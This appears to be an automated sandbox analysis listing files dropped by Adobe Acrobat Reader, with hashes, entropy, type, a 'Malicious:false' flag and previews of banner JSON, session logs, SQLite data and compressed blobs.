                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_1","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"5a9d1955-ab74-4b89-837a-074b702313c0","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL2NvbnZlcnQiLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjoiRXhwb3J0IFBERnMgdG8gTWljcm9zb2Z0IFdvcmQgYW5kIEV4Y2VsLiIsImN0YUxhYmVsIjpudWxsLCJjdGFCZWhhdmlvciI6bnVsbCwiY3RhVXJsIjpudWxsLCJjdGFVcmxUeXBlIjpudWxsLC
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):289
                          Entropy (8bit):5.316353154177006
                          Encrypted:false
                          SSDEEP:
                          MD5:6203819CA7C328B04FE68E2A08B98265
                          SHA1:FB3BC60C62F7AE20B3D02789C6AEA2439A5013E9
                          SHA-256:BD9996466E1C367B90B0815C4D8B238B1C0AE4EDFA70A8E1D9351FA863F2A676
                          SHA-512:A16A366F3A912B3024E7C895F8C0B81B3C3F7593237FC062ED0B5DD832863AEC3B4594808E37C6FFA8FACBBA7714A49096B8D422A16CAD12B95D9F8A9D3147E4
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):292
                          Entropy (8bit):5.318253770351767
                          Encrypted:false
                          SSDEEP:
                          MD5:20EBC3467DBD11C681F24A061BCA9AAF
                          SHA1:A9EDBE3D2291FC621A54B475F25AF11B8F774A96
                          SHA-256:EC125101EC88314BEE365FE90EC19EF6344AE0AECF86D0031F145F3222676FB4
                          SHA-512:88C0BD76DBD1C67DF2391255DE0887EBD9152F882B852B7FDC669CB5B3CF5B84CFA07E3B803451F9FEF0E8B698D49C77AF38C047C50AECBCEA708EB7805822F9
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):2080
                          Entropy (8bit):5.826097793961314
                          Encrypted:false
                          SSDEEP:
                          MD5:879C9BFD9461CA92FD98B2DDF6BC8D66
                          SHA1:BB637DBA819293352C86C5152E5F8504ADFFCBF2
                          SHA-256:24B3F3EED110013121BAB6416AB52F6D17D943C1625A8EC305725A247FA2E6EA
                          SHA-512:07B3B19D001AD97C4B2FEE425E314D3BD10500860E57CCD3843F10939DB55F5954A1F0B57B96E832551EB7D570B1751896F0B8CE7708E0997C028DE4957C928A
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_2","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"164bf29d-ee04-491c-adf2-c0bfeedb2d1b","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL2VkaXQiLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjpudWxsLCJjdGFMYWJlbCI6bnVsbCwiY3RhQmVoYXZpb3IiOm51bGwsImN0YVVybCI6bnVsbCwiY3RhVXJsVHlwZSI6bnVsbCwidHJhY2tpbmdJZCI6bnVsbCwiX21ldGFkYXRhIjp7InN0cmluZ01ldGFkYXRhIjp
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):295
                          Entropy (8bit):5.3415556976688405
                          Encrypted:false
                          SSDEEP:
                          MD5:238A9468B826A9C1149E6BB54A42750D
                          SHA1:308FB6259DD747A870F08619D9A93BA8F387810F
                          SHA-256:117006246F0D4F0B7EF7DD3E19C1359830C9BD71C490F67B9C31774E3DA126F8
                          SHA-512:561F20BBCC884565FD228A9E5A1A514A5A2559E0040132B65B90E6CE744DA9FD95420279F9BB524400A631B9BDC969BF63713B03033489AF4B4361EC60EDAF9B
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):289
                          Entropy (8bit):5.322366357525752
                          Encrypted:false
                          SSDEEP:
                          MD5:7651F6CF74F9A8BE6B0C4F7071ECB7A1
                          SHA1:A83FDC6BD3D015A0E4587391BFFE31BCA49A8A2A
                          SHA-256:545F55F49510871BA3EBE45EB895B59848412862AAB0B828218ACB657D3EBC6E
                          SHA-512:F04087E799C233198629D8F6C74EF27CC541090FC0EC1C75CA3F259A3872F711413DF5B828EBA106D5D787C7A68E9B93E7B955177D53D369912ABBF66A32D50C
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):284
                          Entropy (8bit):5.309391857869186
                          Encrypted:false
                          SSDEEP:
                          MD5:0E45C40C5BBBB475E570D086B76D7B39
                          SHA1:4DAB8E6C0F86E91C00BCE17E3E54115F8C14D3A5
                          SHA-256:95FABCB79009DE2881888BF40E8FB8B77A737410B887DE84FB89EBFA2D18EF03
                          SHA-512:B2CD4ECBE3833A35BDA5B0D303A3911EF690A6896027E7964C30488D781F45B3DB1BA36B2FDB168C7066AF1FE0583B57C01D56D04B8CA3F85DB490D0B7093E03
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):291
                          Entropy (8bit):5.305759734529335
                          Encrypted:false
                          SSDEEP:
                          MD5:5E82158872DC85E56D3A3AAC2BB422E1
                          SHA1:BEBA903A357FEDD2C2B301D91D920CD247F5EBB9
                          SHA-256:9CA3F0A115E0B19E92565846E56898AB301BDEA16C5D20FCD5CD8ECD4903D74A
                          SHA-512:939CF2039D2342C2611CE42AD84330B7167D533DC2DA9E0F6B09A86418071407D60A8500240821BED37FAEF63F2163C7D0D6E56141F60413930529626F49482A
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):287
                          Entropy (8bit):5.309136258020745
                          Encrypted:false
                          SSDEEP:
                          MD5:4600D826524410BB725042F3C963A6D0
                          SHA1:E365AAA1E40E3674AD1E66EE2FED0CC9C79D9327
                          SHA-256:26B40489AAD4F86DD293CF7EFDC62EA91E9BD81F48733F17DB7C47C4323D0CC3
                          SHA-512:5483F3B9CFF8A5602C67966194E98805593DFF99C0FB905BBF6B63BF60529341668CC2379DCB43D0B08477916CFFE3C15D0CE5A20C0AA785BA589AE0EBA7078F
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):2028
                          Entropy (8bit):5.8407940743715345
                          Encrypted:false
                          SSDEEP:
                          MD5:A7E65868753B0FBE33396A82A15FC269
                          SHA1:2E9D21D7E7BDD37E168DB5B2A0FBE937A6FFEFC6
                          SHA-256:CE09951185EC44C6F990CE9BE93449285226B044CC0EC14B356CE42C698FAA02
                          SHA-512:B217EBFB7624B27828AA50F1800C337907ADCC3D88171B6E8FB874BF15A7BB9158B20A8B735F74676757E2FD561BC01B4AF1CD9F9A832C28D308F7DD79044970
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_0","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"339c0ba6-2e61-4622-82f6-f07787d206b8","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL3NpZ24iLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjoiRWFzaWx5IGZpbGwgYW5kIHNpZ24gUERGcy4iLCJjdGFMYWJlbCI6bnVsbCwiY3RhQmVoYXZpb3IiOm51bGwsImN0YVVybCI6bnVsbCwiY3RhVXJsVHlwZSI6bnVsbCwidHJhY2tpbmdJZCI6bnVsbCwiX21ldGF
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):286
                          Entropy (8bit):5.284602013188922
                          Encrypted:false
                          SSDEEP:
                          MD5:BE298150650D52F5A70406A28558A3FB
                          SHA1:60C56992C9D445BEA14478A8EA33EF22978E0AA8
                          SHA-256:87449562A3145086F783B9BFAF94B84B7AAE82491A00E776C5D7E1F8A060F582
                          SHA-512:D527FC41839C634DDDC67BCB11ACF45B1C39450A016EF16A7A3E13D4DB614B178B30E776169817F241F06FBE952B8595800B81AC6D9044B5614D5B553F62C8CA
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):282
                          Entropy (8bit):5.296656115717452
                          Encrypted:false
                          SSDEEP:
                          MD5:C10C84377CAA459A3A17849C13E5688E
                          SHA1:BE78B5B55AC3A4D39ABA6EEE651D457D039558A4
                          SHA-256:9CEF3D54E9974E8291D12CE36842C5FEED67CFF671A95D5182E8F4B9E7798DAD
                          SHA-512:BD7F7B7F0D8751BF699F275480BB01C25493AF62433439B7D46443B8949F008B730090230DF63A468E747EF4B71F846CA7BB22C1CAB9C5EE8410362328B2E192
                          Malicious:false
                          Reputation:unknown
                          Preview:{"analyticsData":{"responseGUID":"4b6eeecd-6319-4ffd-9a20-d5b2174cff49","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1742985867589,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):4
                          Entropy (8bit):0.8112781244591328
                          Encrypted:false
                          SSDEEP:
                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                          Malicious:false
                          Reputation:unknown
                          Preview:....
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:JSON data
                          Category:dropped
                          Size (bytes):2815
                          Entropy (8bit):5.1316187053571545
                          Encrypted:false
                          SSDEEP:
                          MD5:4E8BBF1FBFA9EAE69059523C981677A4
                          SHA1:E43C3AF6750E3D3A0F1B75E2B8D737F09FB32D96
                          SHA-256:B23335C102DE069046982EF0DC46A630DAD1C343094F814ADF364A740E89B0C1
                          SHA-512:FE5852DC9BD657F3298A8802FA52E609C72FC5DE456AD2EC257C3A0DC9E0BA52E477C4E7C972E8E76CAD8EEADA6446E933F7E376AB6D791E6B2731B883512834
                          Malicious:false
                          Reputation:unknown
                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"cde9c474b06b8e9f4448bc9838840a80","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1742807037000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"206e234e5178a0a3d78c017055ec5725","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":2028,"ts":1742807037000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"b3ba8f099ebcd091efcb3e2119657f66","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":2129,"ts":1742807037000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"233a12e58cca7be654a699d0752b9692","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":2080,"ts":1742807037000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"2359382c9abf28365bc6664db9a8105e","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1742807037000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"a8af7503709db3ba97865ac7afcc4ab6","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file",
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                          Category:dropped
                          Size (bytes):12288
                          Entropy (8bit):0.9880972728348022
                          Encrypted:false
                          SSDEEP:
                          MD5:54545DB65F063388A47E7B3BBD887C8C
                          SHA1:7AEF1503535801A21873F5C21DAB56D86F56B082
                          SHA-256:EBBB201F0FABAEE8DE1C945831C82E732F80110D3761695DBD8614C1A41BC992
                          SHA-512:1DC7818738C385C57F5CD99F0FAF2A4B37AAF7F1D4DF4875F1890E1973F6BA688FF6C93995EC5A43ABC29FF58093E68E23C8510E1FC1DE0B12D83939E88C57EA
                          Malicious:false
                          Reputation:unknown
                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:SQLite Rollback Journal
                          Category:dropped
                          Size (bytes):8720
                          Entropy (8bit):1.3447457036948638
                          Encrypted:false
                          SSDEEP:
                          MD5:8F6F28434CDAB4590BD5194A998F5353
                          SHA1:D03084A3BE004A9E78914B40CF450CE15F67289C
                          SHA-256:CBD4753983AED3D1CFCD2CF07768F48C4AF99130BB756232D7277208645321CB
                          SHA-512:B61CD2F41D2AFA913FB3EF980BBEC5714EF51778BF3AE8461D7ABCC52ACE29A2C6E005F145E1E997F46BC80CB1D6E8C360CBF3D13995CDD5CF73C962C5248402
                          Malicious:false
                          Reputation:unknown
                          Preview:.... .c......C........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):246
                          Entropy (8bit):3.51161293806784
                          Encrypted:false
                          SSDEEP:
                          MD5:3FD588F0BBFB66B0EC34C2BF28ADA6DA
                          SHA1:8B9A455E73290BDF03A9B1DACADAA8246C0E39C7
                          SHA-256:F37F2BF774ECC94F12C6BC2C36A0F35BBFCF28F2756341B9975B3B1C306B19A2
                          SHA-512:6133C3B757AF8D7C782444B6CF9AC2BE787CBA24ABB07A357ED189613AF9929509AF51318E145C890698E7316C08E04521B71B1A787396128F7986C455CC18EF
                          Malicious:false
                          Reputation:unknown
                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.4./.0.3./.2.0.2.5. . .0.5.:.0.4.:.0.0. .=.=.=.....
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:ASCII text, with very long lines (393)
                          Category:dropped
                          Size (bytes):16525
                          Entropy (8bit):5.353642815103214
                          Encrypted:false
                          SSDEEP:
                          MD5:91F06491552FC977E9E8AF47786EE7C1
                          SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                          SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                          SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                          Malicious:false
                          Reputation:unknown
                          Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                          Category:dropped
                          Size (bytes):15114
                          Entropy (8bit):5.347349474003338
                          Encrypted:false
                          SSDEEP:
                          MD5:49CD1022AE33C85B42F1648AFA48F7ED
                          SHA1:C62F990E67D7B2C6FA84E8C20832C7D0069F197E
                          SHA-256:8D06B76D793F0A889302F093148CA1C2D24C10D7E39DF44C31ECFB86A9B09BF4
                          SHA-512:CA5A09AA6680A4F6F541B1F9CE116D169470F51E9AC547220DF004F63BBA073BEB1F18CF96E6C2B38597B4707E4452FEF62872104CA96B089C2112832FDC1391
                          Malicious:false
                          Reputation:unknown
                          Preview:SessionID=0af53a08-addb-4451-b4ca-be476736d58b.1742807035099 Timestamp=2025-03-24T05:03:55:099-0400 ThreadID=7144 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=0af53a08-addb-4451-b4ca-be476736d58b.1742807035099 Timestamp=2025-03-24T05:03:55:102-0400 ThreadID=7144 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=0af53a08-addb-4451-b4ca-be476736d58b.1742807035099 Timestamp=2025-03-24T05:03:55:102-0400 ThreadID=7144 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=0af53a08-addb-4451-b4ca-be476736d58b.1742807035099 Timestamp=2025-03-24T05:03:55:102-0400 ThreadID=7144 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=0af53a08-addb-4451-b4ca-be476736d58b.1742807035099 Timestamp=2025-03-24T05:03:55:102-0400 ThreadID=7144 Component=ngl-lib_NglAppLib Description="SetConf
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):29752
                          Entropy (8bit):5.420661478962391
                          Encrypted:false
                          SSDEEP:
                          MD5:559D3AF73ECCA34EE5B6DD7420F2452D
                          SHA1:E6016CB4FBEE0CB7FE26514F8B3E6698883EFA2A
                          SHA-256:8A737F9F5179FF42D944709C0FDDCA2A62B8DF897342E7DC2439BE65771C346C
                          SHA-512:320463E7D168639FA921B34482F981436810108CE8823F4E504D685089C800C23BFC77028900B371E5B91967D467977E77ACB56DF3D57ED93FFA9471D493DE8D
                          Malicious:false
                          Reputation:unknown
                          Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                          Category:dropped
                          Size (bytes):1419751
                          Entropy (8bit):7.976496077007677
                          Encrypted:false
                          SSDEEP:
                          MD5:1A39CAAE4C5F8AD2A98F0756FFCBA562
                          SHA1:279F2B503A0B10E257674D31532B01EA7DE0473F
                          SHA-256:57D198C7BDB9B002B8C9C1E1CCFABFE81C00FE0A1E30A237196A7C133237AA95
                          SHA-512:73D083E92FB59C92049AF8DC31A0AA2F38755453FFB161D18A1C4244747EE88B7A850F7951FC10F842AE65F6CC8F6164231DB6261777EC5379B337CB379BEF99
                          Malicious:false
                          Reputation:unknown
                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                          Category:dropped
                          Size (bytes):1407294
                          Entropy (8bit):7.97605879016224
                          Encrypted:false
                          SSDEEP:
                          MD5:1D64D25345DD73F100517644279994E6
                          SHA1:DE807F82098D469302955DCBE1A963CD6E887737
                          SHA-256:0A05C4CE0C4D8527D79A3C9CEE2A8B73475F53E18544622E4656C598BC814DFC
                          SHA-512:C0A37437F84B4895A7566E278046CFD50558AD84120CA0BD2EAD2259CA7A30BD67F0BDC4C043D73257773C607259A64B6F6AE4987C8B43BB47241F3C78EB9416
                          Malicious:false
                          Reputation:unknown
